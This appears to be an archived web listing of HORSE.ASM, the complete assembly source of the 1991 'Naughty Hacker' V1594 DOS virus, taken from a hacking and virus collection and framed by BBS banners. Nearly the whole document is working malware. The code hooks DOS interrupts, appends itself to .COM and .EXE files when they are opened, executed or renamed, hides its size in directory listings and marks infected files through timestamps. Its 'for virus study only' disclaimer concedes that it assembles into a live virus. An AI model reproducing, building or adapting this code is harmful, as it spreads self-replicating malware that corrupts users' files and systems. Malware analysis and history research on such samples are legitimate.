home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
SOURCE.ZIP
/
HORSE.ASM
< prev
next >
Wrap
Assembly Source File
|
1992-10-11
|
28KB
|
1,010 lines
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
.radix 16
;*********************************
;* The Naughty Hacker's virus *
;*VERSION 3.1 (And not the last.)*
;* ( V1594 ) *
;* Finished on the 10.04.1991 *
;* *
;* Glad to meet you friend! *
;* *
;*********************************
;
; "It's hard to find a black cat in a dark room, especially if it's not there."
;
; Å░Ññ óá▒ ▒▓«¿ «░¿ú¿¡á½¡¿┐ ▓Ѭ▒▓ ¡á V1594 (ᬫ ¼«ªÑ ▓á¬á ñá ¬áªÑ !@!?!).
; Çó▓«░║▓ (è«¡┐) »░Ññóá░¿▓ѽ¡« »░Ññ│»░Ѫñáóá,╖Ñ ¡Ñ ªÑ½áÑ ▓«º¿ ▓Ѭ▒▓ ñá í║ñÑ
; »░«¼Ñ¡┐¡ »« ¡¿¬á¬║ó ¡á╖¿¡, ¡« ᬫ ªÑ½áÑ▓Ñ ñá ú« │▒║ó║░╕Ñ¡▒▓óá▓Ñ ¼«ªÑ ñá
; ¡á»░áó¿▓Ñ ▓«óá ¡á»║½¡« ▒ó«í«ñ¡« »░¿ Ññ¿¡▒▓óÑ¡«▓« │▒½«ó¿Ñ, ╖Ñ ó »«½│╖Ñ¡á▓á
; ¡«óá óÑ░▒¿┐ ¡┐¼á ñá ¿¼á ¡¿¬á¬ó¿ ░áº░│╕¿▓ѽ¡¿ ┤│¡¬╢¿¿.
; Çó▓«░║▓ ¡Ñ »«Ñ¼á ¡¿¬á¬óá «▓ú«ó«░¡«▒▓ ºá ╣Ñ▓¿ »░¿╖¿¡Ñ¡¿ «▓ éêÉôæÇ ......
;
; äá ▒Ñ ¬«¼»¿½¿░á ¡á TURBO ASSEMBLER Ver 1.03B. Æá¬á »«½│╖Ñ¡¿┐ ¬«ñ Ñ ú«▓«ó
; ºá ▒▓á░▓¿░á¡Ñ ¿ ....
;
; Å«ºñ░áó¿ ñ« ó▒¿╖¬¿ VIRUSWRITERS !
;
;
; To be continued ...
;
call Start_Virus
mov dx,offset Hellomsg
mov ah,9
int 21
int 20
Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$'
Virus_lenght equ endcode-adjust
alllen equ buffer-adjust
adjust label word
IP_save label word
First_3 Label Byte
;For .COM file here stores
ret
nop
nop
CS_save dw ? ;The first 3 bytes
SP_save dw ?
SS_save dw 0FFFF ;0FFFF For COM files
signature:
db 'N.Hacker' ;It's me the HORSE !!!
date_stamp:
dd 10041991 ;10.04.1991
Run_The_Program:
pop ds ;Restore saved ds,es,ax
pop es ;ds=es=PSP
pop ax
cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program
je Run_COM_File
mov ax,ds ;Calculate load segment
add ax,10
mov bx,ax
add ax,cs:[bp+CS_save-adjust] ;Calculate CS value
add bx,cs:[bp+SS_save-adjust] ;Calculate SS value
mov ss,bx ;Run .EXE program
mov sp,word ptr cs:[bp+SP_save-adjust]
push ax
push word ptr cs:[bp+IP_save-adjust]
retf
Run_COM_File:
mov di,100
mov si,bp
movsb ;Restore the first 3 bytes
movsw ;Run .COM program
mov bx,100
push bx
sub bh,bh
ret
;*******************************************************************
; *
; This is the program entry.... *
; *
;*******************************************************************
Start_Virus:
call Get_IP ;This is to get the IP value.
Get_IP:
pop bp ;Get it in BP.
sub bp,Get_IP-adjust ;adjust BP point to the begining
cld ;Clear direction flag
push ax ;Save some registres
push es
push ds
mov es,[2] ;get last segment
mov di,Run_The_Program-adjust ;(last segment=segment of virus)
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-Run_The_Program
rep cmpsb ;check if virus is in memory
pop ds
push ds
pop es
je Run_The_Program ;If so then run the program
mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save
mov ax,ds
dec ax
mov ds,ax ;ds=MCB
sub word ptr [3],80 ;Set block size
sub word ptr [12],80 ;Set last segment
mov es,[12] ;steal some memory (2K)
push cs
pop ds
sub di,di
mov si,bp ;prepare to move in high mem
mov cx,alllen ;will move virus+variables
rep movsb ;copy there
push cs
mov ax,Run_The_Program-adjust
add ax,bp
push ax
push es
mov ax,offset Set_Vectors-adjust ;Set vectors
push ax
retf
Find_First_Next:
call Call_Original_INT_21h ;fuck when do the dir command
push bx
push es
push ax
or al,al
jnz Go_Out_ ;if error
mov ah,2f ;get DTA address
int 21
mov al,byte ptr es:[bx+30d] ;Seconds in al
and al,31d ;Mask seconds
cmp al,60d/2 ;Seconds=60?
jne Go_Out_
mov ax,es:[bx+36d]
mov dx,es:[bx+38d] ;Check File size
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_
Adjust_Size:
sub es:[bx+28d+7+1],Virus_lenght ;Adjust size
sbb es:[bx+28d+2+7+1],0
Go_Out_:
pop ax
pop es ;Return to caller
pop bx
iret
Find_First_Next1:
call Call_Original_INT_21h
pushf
push ax
push bx ;fuck again
push es
jc Go_Out_1
mov ah,2f
int 21
mov al,es:[bx+22d]
and al,31d
cmp al,60d/2
jne Go_Out_1
mov ax,es:[bx+26d]
mov dx,es:[bx+28d]
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_1
Adjust_Size1:
sub es:[bx+26d],Virus_lenght
sbb es:[bx+28d],0
Go_Out_1:
pop es
pop bx
pop ax ; Dummy proc far
popf ; ret 2
db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long...
;*************************************
; *
; Int 21 entry point. *
; *
;**************************:KIIII∙*****
INT_21h_Entry_Point:
cmp ah,11
je Find_First_Next ;Find First Next (old)
cmp ah,12
je Find_First_Next
cmp ah,4e ;Find First Next (new)
je Find_First_Next1
cmp ah,4f
je Find_First_Next1
cmp ah,6ch
jne not_create ;Create (4.X)
test bl,1
jz not_create
jnz create
not_create:
cmp ah,3ch ;Create (3.X)
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-adjust],ah
cmp ah,6ch ;Open (4.X)
je create_
cmp ah,3e ;Close
je close_
cmp ax,4b00 ;Exec
je Function_4Bh
cmp ah,17 ;Rename (old)
je ren_FCB
cmp ah,56 ;Rename (new)
je Function_4Bh
cmp ah,43 ;Change attributes
je Function_4Bh
cmp ah,3dh ;Open (3.X)
je open
Return_Control:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
Go_out:
jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21
create_:
or bl,bl ;Create file?
jnz Return_Control
mov dx,si
jmp Function_4Bh
ren_FCB:
cld
inc dx
mov si,dx
mov di,offset buffer-adjust
push di
push cs
pop es ;Convert FCB format Fname into ASCIIZ string
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
sub al,al
stosb
pop dx
push cs
pop ds
jmp Function_4Bh
create:
; cmp word ptr cs:[handle-adjust],0ffff
; jne Go_out
call Call_Original_INT_21h
jc Error
mov word ptr cs:[handle-adjust],ax
jnc Exit_
Error:
mov word ptr cs:[handle-adjust],0ffff ;Useless
Exit_:
; retf 2
db 0ca,2,0
close_:
cmp word ptr cs:[handle-adjust],0ffff
je Return_Control
cmp bx,word ptr cs:[handle-adjust]
jne Return_Control
mov ah,45
call Infect_It
mov word ptr cs:[handle-adjust],0ffff
jmp Return_Control
Function_4Bh:
mov ax,3d00h
open:
call Infect_It
jmp Return_Control
;******************************************
; *
; This infects the programs... *
; *
;******************************************
Infect_It:
call Call_Original_INT_21h ;this is the infecting part
jnc No_error
ret
No_error:
xchg ax,bp
mov byte ptr cs:[flag-adjust],0
mov ah,54
call Call_Original_INT_21h
mov byte ptr cs:[veri-adjust],al
cmp al,1 ;Switch off verify...
jne Go_On_Setting
mov ax,2e00
call Call_Original_INT_21h
Go_On_Setting:
push cs
push cs
pop ds
pop es
mov dx,offset DOS_13h-adjust
mov bx,dx ;Set New DOS int 13h
mov ah,13
call Call_Original_INT_2Fh
mov ax,3513
call Call_Original_INT_21h
push bx
push es
mov word ptr cs:[current_13h-adjust],bx
mov word ptr cs:[current_13h-adjust+2],es
mov ah,25
mov dx,INT_13h_entry-adjust ;Set int 13h
push cs
pop ds
call Call_Original_INT_21h
mov ax,3524
call Call_Original_INT_21h
push bx
push es
mov ah,25
mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...).
call Call_Original_INT_21h
xchg bx,bp
push bx
mov ax,1220
call Call_Original_INT_2Fh
mov bl,es:[di] ;Remember the good old V512 ?
mov ax,1216
call Call_Original_INT_2Fh
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp ax,Virus_lenght+1
sbb dx,0
jnb Go_on
jmp close
Go_on:
cmp byte ptr cs:[function-adjust],3dh
je Scan_name
cmp byte ptr cs:[function-adjust],6ch
jne Dont_Scan_Name
Scan_name:
push di
add di,0f
mov si,offset fname-adjust ;wasn't that the last opened file?
cld
mov cx,8+3
rep cmpsb
pop di
jne Dont_Scan_Name
jmp close
Dont_Scan_Name:
cmp es:[di+18],'MO'
jne Check_For_EXE ;check for .COM file
cmp byte ptr es:[di+17],'C'
jne Check_For_EXE
jmp com
Check_For_EXE:
cmp es:[di+18],'EX'
jne Not_good ;check for .EXE file
cmp byte ptr es:[di+17],'E'
je Check_For_Valid_EXE
Not_good:
jmp close
Check_For_Valid_EXE:
call Read_First_18
cmp word ptr [si],'ZM'
je Valid_EXE ;check for valid .EXE file
cmp word ptr [si],'MZ'
je Valid_EXE
jmp close
Valid_EXE:
cmp word ptr [si+0c],0ffff ;only low-mem .EXE
je Low_Mem
jmp close
Low_Mem:
mov cx,[si+16]
add cx,[si+8] ;Something common with EDDIE..
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di]
sub cx,ax
xchg cx,ax
mov cx,es:[di+2]
sbb cx,dx
or cx,cx
jnz Not_Infected_EXE ;infected?
cmp ax,(endcode-Start_Virus)
jne Not_Infected_EXE
jmp close
Not_Infected_EXE:
mov ax,[si+10]
mov [SP_save-adjust],ax
mov ax,[si+0e]
mov [SS_save-adjust],ax
mov ax,[si+14]
mov [IP_save-adjust],ax
mov ax,[si+16]
mov [CS_save-adjust],ax ;set the new header
mov ax,es:[di]
mov dx,es:[di+2]
add ax,Virus_lenght
adc dx,0
mov cx,200 ;(C) by Lubo & Jan...
div cx
mov [si+2],dx
or dx,dx
jz OK_MOD
inc ax
OK_MOD:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4
push ax
Compute:
shr dx,1
rcr ax,1
loop Compute
pop dx
and dx,0f
sub ax,[si+8]
add dx,Start_Virus-adjust
adc ax,0
mov [si+14],dx
mov [si+16],ax
add ax,(Virus_lenght)/16d+1
mov [si+0eh],ax
mov [si+10],100
write:
mov ax,5700
call Call_Original_INT_21h
push cx
push dx
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
mov cl,20
xchg cl,byte ptr es:[di-0dh]
push cx
mov ah,40 ;this writes the first few bytes and glues the virus
mov dx,buffer-adjust
mov cx,18
call Call_Original_INT_21h
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call Check_For_COMMAND ;(C)
jne Dont_Adjust_Size
sub es:[di+4],Virus_lenght
sbb es:[di+6],0 ;???????????????????????????????
Dont_Adjust_Size:
mov ah,40
sub dx,dx
mov cx,Virus_lenght
call Call_Original_INT_21h
pop cx
mov byte ptr es:[di-0dh],cl
pop dx
pop cx
cmp byte ptr cs:[flag-adjust],0ff
je Set_Time_and_Date
exit:
call Check_For_COMMAND
je Set_Time_and_Date
and cl,11100000b
or cl,60d/2
Set_Time_and_Date:
mov ax,5701
call Call_Original_INT_21h
close:
mov ah,3e
call Call_Original_INT_21h
push es
pop ds
mov si,di
add si,0f
mov di,fname-adjust
push cs
pop es
mov cx,8+3 ;save the fname to a quit place
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-adjust],0ff
jne Dont_Clear_Buffers
mov ah,0dh ;if error occured->clear disk buffers
call Call_Original_INT_21h
Dont_Clear_Buffers:
les bx,[org_13h-adjust]
lds dx,[org_13h-adjust]
mov ah,13
call Call_Original_INT_2Fh
cmp byte ptr cs:[veri-adjust],1
jne Restore_Vectors
mov ax,2e01
call Call_Original_INT_21h
Restore_Vectors:
sub ax,ax
mov ds,ax
pop [24*4+2]
pop [24*4]
pop [13*4+2]
pop [13*4] ;restore vectors and return
ret
com:
test byte ptr es:[di-0dh],4 ;if it is a system file
jnz Not_OK_COM_File ;I had some problems here with
;V1160 & V1776 (with the ball)
cmp es:[di],65535d-Virus_lenght*2-100
ja Not_OK_COM_File
call Read_First_18
cmp byte ptr [si],0E9
jne OK_COM_file
mov ax,es:[di]
sub ax,[si+1] ;infected?
cmp ax,(endcode-Start_Virus+3)
je Not_OK_COM_File
OK_COM_file:
mov word ptr [SS_save-adjust],0FFFF
push si
lodsb
mov word ptr [First_3-adjust],ax
lodsw
mov word ptr [First_3-adjust+1],ax
pop si
mov ax,es:[di]
add ax,Start_Virus-adjust-3
call Check_For_COMMAND
jne Normally
sub ax,Virus_lenght
Normally:
mov byte ptr [si],0E9
mov word ptr [si+1],ax
jmp write
Not_OK_COM_File:
jmp close
Set_Vectors:
sub ax,ax
mov ds,ax
push [1*4]
push [1*4+2] ; <= (C) by N.Hacker.
pushf
pushf
pushf
pushf
mov byte ptr cs:[flag-adjust],ah
mov byte ptr cs:[my_flag-adjust],ah
mov word ptr cs:[limit-adjust],300
mov word ptr cs:[mem_-adjust],org_21h-adjust
mov [1*4],offset trap-adjust
mov [1*4+2],cs
call set_trace
mov ax,3521
call dword ptr [21h*4]
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[mem_-adjust],org_2fh-adjust
call set_trace
mov ax,1200
call dword ptr [2fh*4] ;do trace int 2f
mov byte ptr cs:[flag-adjust],0
mov byte ptr cs:[my_flag-adjust],0FF
mov word ptr cs:[limit-adjust],0C800
mov word ptr cs:[mem_-adjust],org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4] ;do trace int 13
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[limit-adjust],0F000
mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4]
pop [1*4+2]
pop [1*4]
les ax,[21*4]
mov word ptr cs:[current_21h-adjust],ax ;get old int 21
mov word ptr cs:[current_21h-adjust+2],es
mov [21*4], INT_21h_Entry_Point-adjust ;set it
mov [21*4+2],cs
retf
set_trace:
pushf
pop ax
or ax,100
push ax
popf
ret
trap:
push bp
mov bp,sp
push bx
push di
cmp byte ptr cs:[flag-adjust],0ff
je off
mov di,word ptr cs:[mem_-adjust]
mov bx,word ptr cs:[limit-adjust]
cmp [bp+4],bx
pushf
cmp word ptr cs:[my_flag-adjust],0ff
jne It_Is_JA
popf
jb Go_out_of_trap
jmp It_Is_JB
It_Is_JA:
popf
ja Go_out_of_trap
It_Is_JB:
mov bx,[bp+2]
mov word ptr cs:[di],bx
mov bx,[bp+4]
mov word ptr cs:[di+2],bx
mov byte ptr cs:[flag-adjust],0ff
off:
and [bp+6],0feff
Go_out_of_trap:
pop di
pop bx
pop bp
iret
Call_Original_INT_21h:
pushf
call dword ptr cs:[org_21h-adjust]
ret
Call_Original_INT_2Fh:
pushf
call dword ptr cs:[org_2fh-adjust]
ret
INT_24h_entry:
mov al,3
iret
;**************************
; (C) by N.Hacker. *
; (bellow) *
;**************************
INT_13h_entry:
mov byte ptr cs:[next_flag-adjust],0
cmp ah,2
jne Other
cmp byte ptr cs:[function-adjust],03Eh
jne Dont_hide
dec byte ptr cs:[next_flag-adjust]
inc ah
jmp Dont_hide
Other:
cmp ah,3
jne Dont_hide
cmp byte ptr cs:[flag-adjust],0ff
je no_error_
cmp byte ptr cs:[function-adjust],03Eh
je Dont_hide
inc byte ptr cs:[next_flag-adjust]
dec ah
Dont_hide:
pushf
call dword ptr cs:[current_13h-adjust]
jnc no_error_
mov byte ptr cs:[flag-adjust],0ff
no_error_:
clc
db 0ca,02,0 ;retf 2
DOS_13h:
cmp byte ptr cs:[next_flag-adjust],0
je OK
cmp ah,2
je Next
cmp ah,3
jne OK
Next:
cmp byte ptr cs:[next_flag-adjust],1
jne Read
inc ah
jne OK
Read:
dec ah
OK:
test dl,80
jz Floppy
jmp dword ptr cs:[org_13h-adjust]
Floppy:
jmp dword ptr cs:[Floppy_org_13h-adjust]
Read_First_18:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,18
mov dx,buffer-adjust
mov si,dx
call Call_Original_INT_21h
ret
Check_For_COMMAND:
cmp es:[di+0f],'OC'
jne Not_COMMAND
cmp es:[di+11],'MM'
jne Not_COMMAND
cmp es:[di+13],'NA'
jne Not_COMMAND ;check for command.com
cmp es:[di+15],' D'
jne Not_COMMAND
cmp es:[di+17],'OC'
jne Not_COMMAND
cmp byte ptr es:[di+19],'M'
Not_COMMAND:
ret
endcode label word
current_21h dd ?
null dd ? ;I forgot to remove this variable...
current_13h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
Floppy_org_13h dd ?
flag db ? ;0ff if error occures
veri db ?
handle dw ?
fname db 8+3 dup (?)
function db ?
my_flag db ?
limit dw ?
mem_ dw ?
next_flag db ?
buffer label word
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;─────────────────────────────────────────────────────────────────────────;
;──────────────────> and Remember Don't Forget to Call <──────────────────;
;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
;─────────────────────────────────────────────────────────────────────────;
